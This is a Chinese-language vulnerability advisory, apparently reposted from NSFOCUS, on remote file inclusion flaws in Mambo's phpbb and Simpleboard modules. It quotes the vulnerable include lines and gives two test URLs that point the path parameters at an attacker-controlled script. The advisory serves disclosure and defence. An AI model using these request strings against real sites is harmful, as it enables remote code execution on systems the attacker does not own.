⊙　在线帮助 ⊙　添加收藏 ⊙　网站地图 最新资讯 技术中心 下载园地 漏洞总汇 在线书籍 X-档案 法规标准 技术论坛  您现在的位置 >> 首页 >> 漏洞总汇 >> 程序脚本 >> website

Mambo多个远程文件包含漏洞 【责 编】：AcOol 【作 者】：不详 【添 加】：2006-7-11 【更 新】：2006-7-11 【出 处】：绿盟科技 【字 体】：[ 小 大 ] 【浏 览】： 受影响系统：  Mambo phpbb 1.2.4 RC3 Mambo Simpleboard 1.1.0 描述： BUGTRAQ  ID: 18914 Mambo Open Source是一款开放源代码的WEB内容管理系统。 Mambo的多个模块存在远程文件包含漏洞，攻击者可以利用这些漏洞远程执行任意代码。 具体如下： 在download.php模块中： define('IN_PHPBB', true); //$phpbb_root_path = './'; include($phpbb_root_path . 'extension.inc '); include($phpbb_root_path . 'common.'.$phpEx); 在file_upload.php模块中： require_once("$sbp/sb_helpers.php"); <*来源：h4ntu （http://h4ntu.com）      链接：http://secunia.com/advisories/20981/print/         http://www.milw0rm.com/exploits/1995         http://milw0rm.com/exploits/1994 *> 测试： http://[site]/[path]/components/com_forum/download.php?phpbb_root_path=[attacker] http://website.com/components/com_simpleboard/image_upload.php?sbp=[evil_script] 建议： 厂商补丁： Mambo ----- 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本： http://sourceforge.net/projects/mambo ·本站特别声明不要转载或作者授权本站独家播发的文章，请勿转载。 ·本站原创文章可自由转载，但本站作者及本站链接必须保留。 ·非本站原创文章可自由转载，请按作者及文章出处一节，自行链接。 ·转载之图片、文件，链接请不要盗链到本站，且不准打上各自站点的水印，亦不能抹去我站点水印。

+ 本站推荐 + ·Mambo多个远程文件包含漏洞 ·SIPfoundry SIPXtapi CSeq处理 ·PPPD Winbind插件本地权限提升 ·Microsoft IE StructuredGraph ·WordPress错误paged参数SQL操作 + 相关漏洞 + ·Drupal Form_mail模块多个邮件 ·MyPHP CMS global_header.php远 ·CrisoftRicette cookbook.php远 ·PHPMySMS gateway.php远程文件 ·DreamAccount auth.api.php远程 + 热点漏洞 + ·Microsoft Windows Media Play ·Microsoft IE JavaScript OnLo ·RARLAB WinRAR命令行处理溢出漏 ·动网论坛(DVBBS 7.1.0 SP1)Sav ·McAfee VirusScan路径指定权限 + 本站发布 +

关于站点 | 免责申明 | 版权隐私 | 业务合作 | 提供捐助 | 联系我们 Copyright © 2001-2005 CoolerSky. All Rights Reserved.